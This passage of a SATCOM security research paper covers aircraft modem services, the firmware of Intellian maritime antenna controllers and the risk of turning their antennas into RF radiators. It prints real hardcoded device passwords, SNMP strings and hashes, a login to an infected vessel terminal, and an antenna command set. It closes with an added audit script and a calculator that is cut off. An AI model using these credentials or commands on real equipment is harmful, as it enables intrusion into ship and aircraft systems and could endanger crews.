This is an interesting service. It is running on port 2100/TCP generating data that is consumed by 10.7.0.10. By reverse engineering this service, it was possible to discover the functionality described in the request [30] Row44 filed to get the authorization for their systems.

[30] https://apps.fcc.gov/edocs_public/attachmatch/DA-09-1752A1.pdf

43 The following function initializes the parameters

44 Then, at ‘InfoSrvConHandler’ we can see how this service obtains from the demodulator the ‘Es/No’ Data that is sent to the clients that are connected.

45 According to the description, we should assume that the IP that is connected to this InfoServer (10.7.0.10) should belong to the Antenna Control Unit (ACU). We could verify this is actually the case by issuing a query to the SMU’s internal DNS from the in-flight WiFi during a different flight.

dig @128.65.65.98 -x 10.7.0.10 ANY
; <<>> DiG 9.8.3-P1 <<>> @128.65.65.98 -x 10.7.0.10 ANY
; (1 server found)
;; global options: +cmd
;; Got answer:
;; ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 62894
;; flags: qr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: 1, ADDITIONAL: 1
;; QUESTION SECTION:
;10.0.7.10.in-addr.arpa. IN ANY
;; ANSWER SECTION:
10.0.7.10.in-addr.arpa. 86400 IN PTR acu.aircraft.local.
;; AUTHORITY SECTION:
0.7.10.in-addr.arpa. 86400 IN NS localhost.
;; ADDITIONAL SECTION:
localhost. 86400 IN A 127.0.0.1
;; Query time: 1 msec
;; SERVER: 128.65.65.98#53(128.65.65.98)
;; WHEN: Sat May 12 18:29:58 2018
;; MSG SIZE rcvd: 111

The same approach was used to obtain the internal IP, in that segment, for the SMU (10.7.0.1) and the High Power Transceiver (10.7.0.20).

1.0.7.10.in-addr.arpa. 86400 IN PTR smu.aircraft.local.
20.0.7.10.in-addr.arpa. 86400 IN PTR hpt.aircraft.local.

From the VxWorks Shell at the MDU it was possible to ping these devices.

Host Command Server

This service is listening on port 2300/TCP. It relies on the function ‘hostCmd’ that supports multiple commands that can be used for different purposes: change settings, adjust radio parameters, statistics, cryptographic keys, maintenance operations, configuration testing, etc. It is extensively used by other firmware functions.

46 We can see that the SMU (192.168.0.2) is connected to this service (as well as to the web UI).

47 Maritime

The research that was presented in 2014 covered multiple vulnerabilities that were remotely exploitable in maritime SATCOM equipment from different vendors, such as Cobham or JRC. In subsequent years, we have seen a growing interest in everything related to maritime cybersecurity. The situation in this sector can be analyzed using pretty much the same metrics we use for other transportation industries, such as aviation or automotive. In this section we present two fundamental scenarios:
• There are vulnerabilities that allow direct control of an Earth Station on Vessels (ESV), including the antenna.
• Malware is an ongoing problem for these systems.

The Intellian Case

The Intellian portfolio includes multiple satellite antennas for different services such as Global Xpress, FleetBroadband or VSAT. They also manufacture the corresponding ACUs, which have been evolving over time, reaching a point where they include multiple wireless technologies such as WiFi or Bluetooth. This is the trend we see nowadays in devices that were historically isolated or supporting wired connections only. These devices are being designed with additional communication technologies that have been widely present for years in domestic devices but scarcely in the industrial sector. Intellian also provides PC and mobile apps, Aptus [31], that allow controlling these devices.

[31] http://www.intelliantech.com/News/productupdates/view/14

48 This is the common architecture for the solution.

As usual, the first step is to try our luck and find a firmware publicly available. Intellian’s main website requires login to download firmware updates but a simple google search revealed that their Amazon S3 buckets are wide open. In fact, someone left a message warning about this problem:

Our target was the ‘iARM_Firmware_Update-V1.10A.tgz’ file, which contains an embedded ramdisk with the filesystem.

There are several hardcoded, in certain cases also undocumented, credentials that can be used to gain access to the affected device. These credentials have been found in the following files:

File: '/etc/bim_user.cfg'
# user for web
#
#
# username password usergroup last password change

49
sys_user = ["intellian" , "12345678", 0, 0] # normal user
sys_user = ["masteruser", "intellian", 1, 0] # master user
sys_user = ["guest", "guest", 2, 0] # guest user

File: '/etc/shadow'
root:$1$aB6lKKRK$VqBO1V4.mK/2z9VWDYscO1:13514:0:99999:7:::
bin:*:10933:0:99999:7:::
daemon:*:10933:0:99999:7:::
adm:*:10933:0:99999:7:::
lp:*:10933:0:99999:7:::
sync:*:10933:0:99999:7:::
shutdown:*:10933:0:99999:7:::
halt:*:10933:0:99999:7:::
uucp:*:10933:0:99999:7:::
operator:*:10933:0:99999:7:::
nobody:*:10933:0:99999:7:::
default::10933:0:99999:7:::
sysbas:$1$G3bCE4tt$Qj63oR1J2TjYHTrIHQacJ0:13514:0:99999:7:::
intellian_admin:$1$q8wWDSXA$e8u3spdqjtju5KRADToQo0:13514:0:99999:7:::

File: '/etc/passwd'
root:$1$1NMnvCi3$V4Im8YxDE0qlYFQbq1kkX.:0:0:root:/tmp:/bin/sh
ftp:$1$8/cQQBxs$TnowI83eVlDuLPxCwatC31:1001:1001:Linux User,,,:/home/ftp:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:100:sync:/bin:/bin/sync
mail:x:8:8:mail:/var/spool/mail:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
operator:x:37:37:Operator:/var:/bin/sh
haldaemon:x:68:68:hald:/:/bin/sh
dbus:x:81:81:dbus:/var/run/dbus:/bin/sh
nobody:x:99:99:nobody:/home:/bin/sh
sshd:x:103:99:Operator:/var:/bin/sh
default:x:1000:1000:Default non-root user:/home/default:/bin/sh
sysbas:x:0:0:Linux User,,,:/tmp:/bin/sh
intellian_admin:x:0:0:Linux User,,,:/tmp:/bin/sh

File: '/etc/snmp.cfg'
snmpv2 = "readwrite"
snmpv2_community = "intellian"
snmp_param = [ "sysLocation" , "intellian" ]
snmp_param = [ "sysContact" , "intellian" ]
trap_dest = "192.168.1.1"
trap_port = "162"
trap_param = "-v 2c -c public"
AUTHENTICATION = "auth"
AUTH_USER = "intellian"
AUTH_ENC = "md5"
AUTH_PASS = "12345678"

50
PRIV_ENC = ""
PRIV_PASS = ""
context_name = ""
engine_id = ""
reboot_count = 0

Vulnerable CGIs

The CGIs that comprise the web UI contain multiple vulnerabilities, mainly unsanitized calls to 'system' where parameters can be controlled by the attacker. It is possible to use these CGIs to execute arbitrary commands without being previously authenticated.

File: /usr/local/www/cgi-bin/setagent.cgi

The security posture of the ACU firmware is certainly poor. The purpose of this research is not enumerating vulnerabilities, but it is trivial to remotely gain root access to the ACU not only via the web UI, FTP, SSH, and Telnet but also by abusing other services.
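The account findings listed above (extra UID 0 accounts, hashes stored in the world-readable passwd file, an empty password field, MD5-crypt hashes) can be checked automatically when reviewing an unpacked firmware image. The following is an added example, not code from the paper or from the vendor; the sample files are constructed, and the account name vendor_admin and all hash strings are placeholders.

```python
"""Audit passwd/shadow files from an unpacked firmware image for baked-in accounts."""

# Constructed sample files that mirror the layout of the listings above.
# Account names and hash strings are placeholders, not values from a real image.
SAMPLE_PASSWD = """\
root:$1$saltsalt$PLACEHOLDERHASH0000000:0:0:root:/tmp:/bin/sh
ftp:$1$saltsalt$PLACEHOLDERHASH1111111:1001:1001:Linux User,,,:/home/ftp:/bin/sh
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
default:x:1000:1000:Default non-root user:/home/default:/bin/sh
vendor_admin:x:0:0:Linux User,,,:/tmp:/bin/sh
"""
SAMPLE_SHADOW = """\
root:$1$saltsalt$PLACEHOLDERHASH2222222:13514:0:99999:7:::
daemon:*:10933:0:99999:7:::
default::10933:0:99999:7:::
vendor_admin:$1$saltsalt$PLACEHOLDERHASH3333333:13514:0:99999:7:::
"""

HASHED = ("md5crypt", "other-crypt", "des")
WEAK = ("md5crypt", "des")


def classify(secret):
    """Classify the password field of a passwd or shadow entry."""
    if secret == "":
        return "empty"          # account accepts a login with no password
    if secret == "x":
        return "shadowed"       # passwd entry defers to /etc/shadow
    if secret[0] in "*!":
        return "locked"         # no password login possible
    if secret.startswith("$1$"):
        return "md5crypt"
    if secret.startswith("$"):
        return "other-crypt"    # e.g. $5$ / $6$ SHA-crypt
    return "des"                # legacy 13-character DES crypt


def rows(text, min_fields):
    """Yield colon-separated records, skipping blanks, comments and short lines."""
    for line in text.splitlines():
        line = line.strip()
        fields = line.split(":")
        if line and not line.startswith("#") and len(fields) >= min_fields:
            yield fields


def _secret_findings(findings, name, kind):
    if kind == "empty":
        findings.add((name, "empty-password"))
    if kind in WEAK:
        findings.add((name, "weak-hash"))


def audit(passwd_text, shadow_text):
    """Return a sorted list of (account, issue) pairs."""
    findings = set()
    for fields in rows(passwd_text, 7):
        name, secret, uid = fields[0], fields[1], fields[2]
        kind = classify(secret)
        if uid == "0" and name != "root":
            findings.add((name, "uid0-alias"))       # second root account
        if kind in HASHED:
            findings.add((name, "hash-in-passwd"))   # readable by every user
        _secret_findings(findings, name, kind)
    for fields in rows(shadow_text, 2):
        _secret_findings(findings, fields[0], classify(fields[1]))
    return sorted(findings)


if __name__ == "__main__":
    for account, issue in audit(SAMPLE_PASSWD, SAMPLE_SHADOW):
        print(f"{account:15s} {issue}")
```

Any reported account that is not documented for the operator, or that cannot be changed after deployment, is a finding to raise with the vendor.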

51 Malware Onboard

By analyzing one of the random vessels equipped with products that can be found exposed to the Internet, we discovered the ACU was infected by the Mirai botnet. In this paper we previously described how hosts infected by the Gafgyt botnet were trying to get access to an airborne modem, fortunately without success. In this case the ACU was already infected.

Connected to XXXX-MASKED.nat.globalconnex.net.
Escape character is '^]'.
XXXX login: intellian_admin
Password:
# uname -a
Linux BIM 2.6.39+ #448 PREEMPT Thu Nov 3 09:53:39 KST 2016 armv5tejl GNU/Linux
# w
-sh: w: not found
# ps aux
PID   USER  TIME   COMMAND
1     root  0:04   init
2     root  0:01   [kthreadd]
3     root  0:00   [ksoftirqd/0]
...
596   root  2:28   [flush-ubifs_0_2]

52
630   root  12:01  /usr/sbin/telnetd
634   root  0:00   /usr/sbin/vsftpd
643   root  59:17  /usr/local/sbin/dropbear -K 10
645   root  4:37   /sbin/pinetd
651   root  0:53   /usr/sbin/crond -l 8
652   root  0:00   /sbin/getty -L console 115200 vt100
711   root  0:00   /sbin/udhcpd -S /etc/udhcpd_running.conf
732   root  34:34  event_logger
733   root  1:11   trap_sender
747   root  169:32 /bin/acu_server
813   root  87:27  snmpd -f -c /etc/snmpd.conf
844   root  20:19  /bin/wifi_manager
845   root  65:46  /bin/sg_daemon
846   root  213:36 /bin/modem_mon
847   root  2:52   /bin/imon -l 8
852   root  0:53   /usr/sbin/crond
854   root  0:00   stunnel /etc/stunnel.conf
862   root  14:30  /bin/lighttpd -D -m /lib -f /etc/lighttpd.conf
6106  root  0:08   /usr/local/sbin/dropbear -K 10
6722  root  0:04   [kworker/0:0]
6852  ftp   0:06   {wul0a7f2w0db200} gubsprpsodbs
6854  ftp   0:48   {wul0a7f2w0db200} gubsprpsodbs
11060 root  0:00   [kworker/0:1]
11246 root  0:06   /usr/local/sbin/dropbear -K 10
11837 root  8:14   /bin/cgi_uif_storage_updater -K 10
12285 root  0:11   /usr/local/sbin/dropbear -K 10
13247 root  0:07   /usr/local/sbin/dropbear -K 10
13342 root  0:07   /usr/local/sbin/dropbear
13343 root  0:06   /usr/local/sbin/dropbear -K 10

One of the most interesting parts of this firmware is the binary ‘acu_server’, which implements several protocols to interface with different SATCOM modems.

Controlling the Antenna

Once the ACU had been compromised, we were interested in having full control over the antenna. Intellian has developed a protocol for this purpose apparently known as ‘UIF’. We can reverse engineer it from different sources:
• Firmware (acu_server, vtysh, acu_tool, uif_tool...)
• APTUS apps

This is a simple text-based protocol that follows this pattern:

{COMMAND PARAMETERS}CHECKSUM

These are the supported commands:

public enum UIF {
    UIF_OP_RESTART("OR"),
    UIF_OP_SETUP("OS"),
    UIF_SELECT_TR_SAT("LT"),
    UIF_SET_TR_SAT("ST"),
    UIF_REQUEST_SIGNAL_LEVEL("QV"),
    UIF_REQUEST_ANT_STATUS("QS"),
    UIF_REQUEST_ANT_INFO("QI"),
    UIF_REQUEST_ANT_INFO_ALL("QA"),
    UIF_REQUEST_ANT_POS("QP"),
    UIF_REQUEST_DIAGNOSIS("QD"),

53
    UIF_REQUEST_PATTERN("QT"),
    UIF_REQUEST_VOLTAGE("QG"),
    UIF_SET_DEFAULT("SD"),
    UIF_SET_DEFAULT_WITHOUT_OFFSET("Sd"),
    UIF_SET_GPS("SG"),
    UIF_SET_SKEW_ANGLE("SK"),
    UIF_SET_SKEW_OFFSET("KO"),
    UIF_SET_LOCAL_FREQUENCY("SL"),
    UIF_SET_PAIR_SAT("SP"),
    UIF_EDIT_SAT_INFO("EI"),
    UIF_EDIT_SAT_INFO_SPARE("Eu"),
    UIF_EDIT_TR_INFO("ET"),
    UIF_EDIT_TR_INFO_SPARE("EU"),
    UIF_SET_ANT_PARAMETER("SA"),
    UIF_SET_CONTROL_PARAMETER("SC"),
    UIF_SET_ANTENNA_PARAMETER("Sa"),
    UIF_SET_ANT_FLAG("FG"),
    UIF_SET_POWER("SW"),
    UIF_SET_DISEQC("SQ"),
    UIF_CALIBRATION_SKEW("CK"),
    UIF_GOTO_POSITION("GO"),
    UIF_MOVE_STEP("MO"),
    UIF_MOVE_SKEW("MS"),
    UIF_FIND_SYMBOL("FS"),
    UIF_FIND_OFFSET("FO"),
    UIF_FIND_NOISE_LEVEL("FN"),
    UIF_COMMAND_ACK("AC"),
    UIF_SEND_NUM_SAT("NN"),
    UIF_SEND_SELECT_TR_SAT("NS"),
    UIF_SEND_SIGNAL_LEVEL("NV"),
    UIF_SEND_AGC_LOCK("Nv"),
    UIF_SEND_ANT_STATUS("NA"),
    UIF_SEND_ANT_INFORMATION("Ni"),
    UIF_SEND_SW_VERSION("NW"),
    UIF_SEND_PRODUCT_NAME("Nn"),
    UIF_SEND_GPS("NG"),
    UIF_SEND_LOCAL_FREQUENCY("NL"),
    UIF_SEND_PAIR_SAT("NP"),
    UIF_SEND_SAT_INFO("NI"),
    UIF_SEND_SAT_INFO_SPARE("Nu"),
    UIF_SEND_TR_INFO("NT"),
    UIF_SEND_TR_INFO_SPARE("NU"),
    UIF_SEND_ANT_PARAMETER("NR"),
    UIF_SEND_CONTROL_PARAMETER("NC"),
    UIF_SEND_ANTENNA_PARAMETER("Np"),
    UIF_SEND_ANT_FLAG("NF"),
    UIF_SEND_DIAGNOSIS("ND"),
    UIF_SEND_POWER("Nw"),
    UIF_SEND_VOLTAGE("VL"),
    UIF_SEND_DISEQC("NQ"),
    UIF_SEND_NID("ID"),
    UIF_SEND_PATTERN("PT"),
    UIF_SEND_ANT_POS("AP"),
    UIF_SEND_CUR_SKEW_ANGLE("TK"),
    UIF_SEND_SKEW_ANGLES("NK"),
    UIF_SEND_AXIS_RANGE("AX"),
    UIF_SEND_SYMBOL("SS"),
    UIF_SEND_OFFSET("SO"),
    UIF_SEND_NOISE_LEVEL("SN"),
    UIF_SEND_ETC("TC"),
    UIF_SEND_MESSAGE("ME"),
    UIF_SET_TRIPLE_SAT("TR"),
    UIF_GOTO_BOOTLOADER("GB"),
    UIF_SET_SERIAL_NO("TS"),
    UIF_SEND_SERIAL_NO("EN"),
    UIF_SET_EL_OFFSET("TL"),
    UIF_SEND_EL_OFFSET("DL"),
    UIF_SET_SKEW_OFFSET_TABLE("KT"),
    UIF_SET_PRODUCT_NAME("Sn"),
    UIF_SET_MIM("SM"),
    UIF_SET_HEADING("SH"),

54
    UIF_STAB_JOB_COMMAND("BJ"),
    UIF_STAB_SET_STATUS("BS"),
    UIF_STAB_SET_PARAMETER("BP"),
    UIF_STAB_SET_TARGET_OFFSET("BT"),
    UIF_PCU_JOB_COMMAND("CJ"),
    UIF_PCU_SET_PARAMETER("CP"),
    UIF_GYRO_REQUEST("GR"),
    UIF_GYRO_SEND("GN"),
    UIF_GYRO_SET("GS"),
    UIF_SET_BAND_SW("LP"),
    UIF_SEND_BAND_SW("lp"),
    UIF_SET_BAND_SW_OFFSET("BO"),
    UIF_SEND_BAND_SW_OFFSET("bo"),
    UIF_DISEQC_12("Di"),
    UIF_MODEM_REQUEST("MR"),
    UIF_MODEM_PROTOCOL("MP"),
    UIF_SEND_MODEM_TX_ENABLE("TX"),
    UIF_BLOCK_ZONE("BK"),
    UIF_GPS_EX("Vg"),
    UIF_MULTIPLE_LOCAL_FREQUENCY("Vl"),
    UIF_TRACKING_PARAMETER("Vt"),
    UIF_NBD_INFO("Vn"),
    UIF_SYSTEM_TYPE("Vs"),
    UIF_SAT_DVB_INFO("Vd"),
    UIF_BACKUP_RESTORE("BR"),
    UIF_LOAD_LIBRARY("LL"),
    UIF_PC_CONNECT_MONITOR("PM"),
    UIF_DIAGNOSIS_RESULT("DD"),
    UIF_ACU_SETTINGS("AS"),
    UIF_POL_CHANGE("PC"),
    UIF_BOOT_STATUS("BD"),
    UIF_SAT_DVB_INFO_C("Cd"),
    UIF_NBD_INFO_C("Cn"),
    UIF_SAT_INFO_C_KU("CI"),
    UIF_TRACKING_PARAMETER_C("Ct"),
    UIF_TRACKING_PARAMETER_C_KU("CT"),
    UIF_TRACKING_PARAMETER_SCAN_OFFSET("CS"),
    UIF_GPS_DATE("GD"),
    UIF_USB_COMMAND("US"),
    UIF_SEND_OPEATION("LO"),
    UIF_SEND_HISTORY("MH"),
    UIF_SEND_MESSAGE_LOG("ML"),
    UIF_SAT_DVB_INFO_LONG("vD"),
    UIF_SAT_DVB_INFO_LONG_C("cD"),
    UIF_INTERNAL_PROTOCOL("YS"),
    UIF_SEND_SESSION_ID("IA"),
    UIF_SEND_SW_UNICODE("SU"),
    UIF_SEND_SPECTRUM_GRAPH("NB"),
    UIF_SYSTEM_INFORMATION("SI");

Using this protocol, it is possible to control any parameter in the targeted antenna. Blocking zones are areas where the signal is blocked between the antenna and the satellite because of the ship’s superstructure. These are zones that can be configured in the antenna using the specific command ‘BK’ (BLOCK_ZONE) to prevent RF exposure.

An attacker can bypass this safety protection by either disabling the selected Blocking Zones or directly controlling the Azimuth and Elevation of the antenna in ‘Setup Mode’. Certain antennas may have additional physical controls to prevent harmful antenna pointing, in addition to software controls.


56 Military

In 2014, in the paper “A Wake-Up Call For SATCOM Security” [32], we described a potential attack scenario where enemy forces could leverage vulnerable SATCOM equipment to pinpoint military units, as these terminals usually need an attached GPS device. IOActive discovered several military SATCOM terminals exposed to the Internet, thus leaving them open to attacks. These systems can be accessed through multiple ports that expose both common and proprietary services. It was possible to discover where these terminals were deployed as the GPS position was available. These devices were deployed in active conflict zones. Due to the sensitive nature of this information IOActive will not disclose further details about these systems.

[32] https://ioactive.com/pdfs/IOActive_SATCOM_Security_WhitePaper.pdf

57 Cyber-Physical Attacks

We have already described the approach used to turn a compromised SATCOM terminal into an intentional radiator, which involves two fundamental actions:
• Controlling the antenna positioning
• Controlling the ability to transmit.

This part elaborates the theory and regulations behind HIRF attacks and presents a numeric model to assess the actual impact on both Aviation and Maritime industries.

Beyond Logic Attacks, Going Physical

Radio waves and microwaves emitted by transmitting antennas are one form of electromagnetic energy, which is collectively described as Radio Frequency (RF). This is achieved by electrically oscillating free electrons back and forth within a conducting material.

If we think of non-ionizing radiation as the propagation of energy through space, then a SATCOM antenna serves as the interface between the compromised device and the propagation medium, which in this case is free space. So, from a low-level perspective, the antenna is basically allowing us to generate controlled waves of electric and magnetic energy directed toward a specific location.

What happens once this electromagnetic energy reaches its target? The electric field component will exert a force on charged particles that may push away or attract electrons. From these interactions there is a derived thermal effect, which, for non-ionizing radiation, is the only adverse biological damage that has been demonstrated. It may help to get the idea behind these attacks if we mention that this is basically the same physical principle microwave ovens use to cook food or heat liquids. For the purpose of safety analysis, the FCC standard [33] defines two types of exposure:

[33] https://transition.fcc.gov/Bureaus/Engineering_Technology/Documents/bulletins/oet56/oet56e4.pdf

58
• Controlled environment
These are situations usually occurring at workplaces or in restricted areas. Persons must be aware of the potential for exposure and be able to exercise control over their exposure.
• Uncontrolled environment
These are situations where persons may not be aware of their exposure. They also apply in situations where persons are aware of their exposure but cannot do anything to limit it.

The uncontrolled environment would be the attacker’s scenario. The following table shows the time-averaging limits.

The risk is not limited to biological tissues; it also extends to electrical and electronic systems, mainly because of coupling. In this context it seems obvious that, nowadays, any system that is designed to radiate RF energy needs to be analyzed to verify that the RF exposure is within safe limits. However, unsafe levels can still be reached due to several factors such as high transmitter power, high antenna gain, close proximity to a transmitting antenna, or any combination thereof.

59 We describe as High Intensity Radiated Fields those that can produce, within the frequency domain from 10 kHz to 40 GHz, an electromagnetic field strength sufficient to adversely affect a living organism or cause a malfunction to an electrical or electronic system. Due to the nature of the medium and locations where maritime and aviation industries perform their activities, the exposure to this kind of fields is higher for aircraft. As a result the protection standards against the adverse effects of HIRF are much more developed in the aviation industry.

High Intensity Radiated Fields in the Aviation Industry

It is important to note that the Electromagnetic Effect Harmonization Working Group was created to harmonize HIRF regulation for Europe and the United States, so the same regulatory levels are applied in multiple countries.

The aviation industry has been actively researching the risks of HIRF since at least the early 1980s [34]. Standards quickly followed this initial empirical research with a Special Condition for HIRF that was put into effect in 1986 [35]. Detailed testing procedures for HIRF were published in the late 1980s in DO-160C, “Environmental Conditions and Test Procedures for Airborne Equipment”. The EU-US harmonized HIRF standards were put in place in the early 1990s and regularly refined with the latest significant update in 2006 [36]. The industry has done a good job of putting strong design and testing standards in place that would protect critical flight systems from HIRF attacks using airborne SATCOM equipment. The industry should be commended for identifying an emerging threat in HIRF and responding to put policy and technical controls in place to mitigate the risks.

The electromagnetic HIRF environment results from the transmission of electromagnetic energy from radar, radio, television, and other ground-based, shipborne, or airborne RF transmitters.

The three defined environments are covered in the following table.

[34] http://www.tc.faa.gov/its/worldpac/techrpt/ct83-49.pdf
[35] https://www.federalregister.gov/documents/2006/02/01/06-895/high-intensity-radiated-fields-hirf-protection-for-aircraft-electrical-and-electronic-systems
[36] ibid

60 These HIRF limits apply to all equipment onboard an aircraft and not only to the radio systems such as the Instrument Landing System, but also to the flight management, engine control, fuel management, electronic display, instrumentation systems, auto-pilot, etc. However, not all of them are equally certified; according to their criticality they need to comply with the following table [37].

[37] https://www.faa.gov/regulations_policies/advisory_circulars/index.cfm/go/document.information/documentID/1024526

61 The certification requirement for aircraft before 1986 has been in the order of 20 V/m and after 1986 the requirement was raised to 190 V/m and 150 V/m for the Ku and Ka bands respectively [38]. Nevertheless, it is assumed that modern aircraft are protected against HIRF higher than those for which they have been certified.

These regulatory levels are derived from specific conditions where certain assumptions were made; among them we can find the following:
• The noncumulative field strength was calculated; however, simultaneous illumination by more than one antenna was not considered. [39] [40]

This assumption has been consistent through the different amendments. Based on this, we considered there was an important factor to take into account: the scale of the attack. In the scenario we have been describing in this paper, it was possible to have multiple compromised antennas illuminating an aircraft at the same time, so in our assessment of the risks we also considered the aggregated electric field strength.

[38] https://en.wikipedia.org/wiki/DO-160
[39] https://rosap.ntl.bts.gov/view/dot/15645/Print
[40] https://www.federalregister.gov/documents/2006/02/01/06-895/high-intensity-radiated-fields-hirf-protection-for-aircraft-electrical-and-electronic-systems

62 Due to its relevance for this research, we reproduce the following text extracted from a real accident report published by the Transportation Safety Board of Canada [41]. It describes how HIRF can disrupt avionics.

Disruptions to Avionics

Digital devices incorporate frequency sources, or clocks, for the timing and control of internal digital functions. Aircraft avionics use digital devices that are specifically qualified for aircraft use. These digital devices tend to have slower processor and data bus clock speeds than modern consumer electronics. For aircraft flying today, the avionics processor and data bus clock speeds range from 2 MHz to approximately 300 MHz. The bandpass region for a digital device extends from the clock speed to approximately 10 times the clock speed.

HIRF interference that appears within the bandpass of a digital device may be interpreted as a legitimate control signal, driving the device into unpredictable states. HIRF interference that is not within the bandpass of the digital device may be rectified by components of the digital circuit, such as diodes. The interference will then appear as a DC offset on the control signal, triggering uncommanded state changes or locking the device into one state. Some failure modes may not be readily apparent to the operator. It is more likely, however, that error detection circuitry will detect the corrupted control signal(s), in which case error messages will be generated and system degradation will occur in a relatively controlled manner.

In the RF spectrum, digital circuits may be disrupted by potential differences ranging from 0.4 to 1.2 V. Analog circuits can be sensitive to induced gradients as small as 50 mV, although this latter value is largely dependent on the gain characteristics of the affected circuitry. However, monitoring circuits on analog systems and error detection algorithms in digital systems are normally able to detect HIRF interference before a

[41] http://www.tsb.gc.ca/eng/rapports-reports/aviation/1998/a98h0003/02sti/sti_toc.asp

63 major upset occurs. Power supply disconnects are the most common response to HIRF interference.

It is also theoretically possible to generate specific third-order intermodulation products that might create interferences in some of the RF bands used aboard.

Analysis of Radiation Hazards

All those companies that want to receive a license to operate either Earth Stations Aboard Aircraft (ESAA) or Earth Stations On Vessels (ESV) [42] need to submit an RF hazard analysis determining via calculation, simulation, or field measurement whether the devices in dispute comply with the established regulatory limits.

The FCC provides the equations and methodology to perform this evaluation [43]. It is highly recommended to consult the referenced FCC bulletin #65 before continuing, as this is the approach that has been used to implement the model.

Usually vendors limit this analysis to the near-field once they have demonstrated they do not exceed the maximum values allowed.

The antenna radiation field is divided into three distinct regions, where the characteristics of the radiated wave are different. The picture below contains a summary of some of the most significant equations that have been used in the model.

[42] https://www.gpo.gov/fdsys/pkg/CFR-2010-title47-vol2/pdf/CFR-2010-title47-vol2-sec25-222.pdf
[43] https://transition.fcc.gov/Bureaus/Engineering_Technology/Documents/bulletins/oet65/oet65.pdf

where

pfd: Power flux density
P: Power fed to the antenna
G: Antenna gain in the direction of interest relative to an isotropic radiator
d: Distance to the point of interest

During the study of antennas, a useful abstraction exercise is to consider them as isotropic radiators, which means they are equally radiating in all directions, following a spherical pattern. However, the antennas considered in this study are directional antennas. This means that for specific angles a gain (G) can be measured, where more power output is radiated compared to the ideal radiation pattern of an isotropic radiator. As we can see in the picture, the main lobe is where the strength of the radiated power is higher.

We are describing cyber-physical attacks, using compromised SATCOM antennas, assuming the main lobe is illuminating the target at a distance 'd', which is located in the Far-Field. In this region, the antenna radiation pattern is fully formed, and does not depend on the distance any more, but on the antenna's azimuth and elevation angles, which as we have seen can be controlled. Those scenarios where near-field models should be applied should be evaluated on a case-by-case basis.

Antenna Models

For assessing the feasibility of cyber-physical attacks, we are covering two antennas, which are equivalent in terms of attack vectors to those we have already analyzed from the security perspective.

Intellian GX60 – Maritime

Figure 8. http://www.intelliantech.com/Satcom/gx/gx60

The following tables show both the Electric Field Strength and the Power Density starting at the Far-Field range.

In the Far-Field the antenna exceeds the Maximum Permissible Exposure (MPE) for Uncontrolled exposure (1 mW/cm²), thus potentially creating a safety risk. Taking this into account, we can define two attack scenarios. It is assumed the antenna has been compromised using the aforementioned techniques.

Cargo Vessel

Assuming a regular beam of 60 meters, the Far-Field starts at 25.35 meters, so the bridge can be affected by uncontrolled RF exposure.

In this scenario it is also important to note that final power density values can be increased by vessel design factors, which may cause resonance during the propagation.

Cruise ships

The structure of these ships makes them prone to this kind of situation, as we can see in the picture [44]. As we have previously described, a crucial factor is that attackers can disable blocking zones.

[44] https://pro2-bar-s3-cdn-cf4.myportfolio.com/ebb2d4b275615064f8500d0507f0801c/5903bcbb-1c60-4baf-b6cc-5255a85a71d6_rw_1200.jpg?h=eee7f61b319b547ebde970c60d9fcdeb

Once again, we need to take into account the scale of the attack, as there may be more than one antenna in the same ship that can be compromised.

Kustream 1500 - Aviation

This is a phased array antenna with a higher transmission power than the Kustream 1000, originally used by GEE.

In the Far-Field the antenna exceeds the MPE regulatory limits for uncontrolled exposure. Assuming the ARINC 791 equipment has been compromised using the aforementioned techniques we can describe the following two scenarios:

Ground

The Far-Field starts at 12 meters. With minimum distances between airplanes and gates, it is unlikely this might create any kind of safety risk. We can see a clear picture of this situation using a satellite view of the Atlanta International Airport, where it is possible to identify Southwest airplanes equipped with a SATCOM antenna.

Assuming the antenna is transmitting at maximum EIRP, at that distance, even without taking into account any further attenuation, the power density would be approximately 0.1 mW/cm², well below the MPE for uncontrolled exposure.

In terms of the aggregated Electric Field Strength, in order to exceed the regulatory level of 190 V/m we would need more than 10 aircraft radiating at the minimum distance that needs to be maintained between aircraft. This situation is impractical in modern airports.

In-Flight

Assuming the vertical minimum distance of 1000 ft between in-flight aircraft, and also the transient nature of the illumination in this scenario, we would require hundreds of airplanes illuminating the target to exceed the regulatory levels, which is not feasible.

The analysis of HIRF hazards is a complex area, with multiple scenarios and conditions that can modify the outcome. Nevertheless, IOActive would like to clarify that based on the feedback provided by the aviation industry, through A-ISAC, the maturity of aviation technologies, compensating controls and our own research we consider that, at this point, there is no safety risk for the aviation industry.
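The far-field arithmetic behind the figures in this section, as an added example that is not part of the IOActive paper: it applies the far-field equations of FCC OET Bulletin 65 (boundary 0.6·D²/λ and pfd = P·G/(4π·d²)) and converts power density to field strength. The 0.65 m dish at 30 GHz, the 1810 W EIRP and the in-phase summation of fields are assumptions made for this example, not values or methods stated in the paper.

```python
import math

C = 299_792_458.0        # speed of light, m/s
Z0 = 376.73              # impedance of free space, ohms
MPE_UNCONTROLLED = 1.0   # mW/cm^2, uncontrolled-exposure limit quoted in the paper
E_LIMIT = 190.0          # V/m, regulatory level quoted in the paper


def far_field_start_m(diameter_m, freq_hz):
    """OET 65 far-field boundary for an aperture antenna: 0.6 * D^2 / lambda."""
    return 0.6 * diameter_m ** 2 / (C / freq_hz)


def pfd_mw_cm2(eirp_w, distance_m):
    """On-axis far-field power flux density, pfd = P*G / (4*pi*d^2).

    eirp_w is the product P*G in watts; the result is converted from
    W/m^2 to mW/cm^2 (1 W/m^2 = 0.1 mW/cm^2).
    """
    if eirp_w <= 0 or distance_m <= 0:
        raise ValueError("EIRP and distance must be positive")
    return eirp_w / (4 * math.pi * distance_m ** 2) * 0.1


def e_field_v_m(pfd):
    """Plane-wave field strength for a power density given in mW/cm^2."""
    return math.sqrt(pfd * 10.0 * Z0)


def sources_to_exceed(e_single, e_limit=E_LIMIT):
    """Identical sources needed to exceed e_limit if their fields add in
    phase (a worst-case assumption of this example)."""
    return math.floor(e_limit / e_single) + 1


def assess(eirp_w, distance_m):
    """Compare one transmitter at distance_m against both limits."""
    s = pfd_mw_cm2(eirp_w, distance_m)
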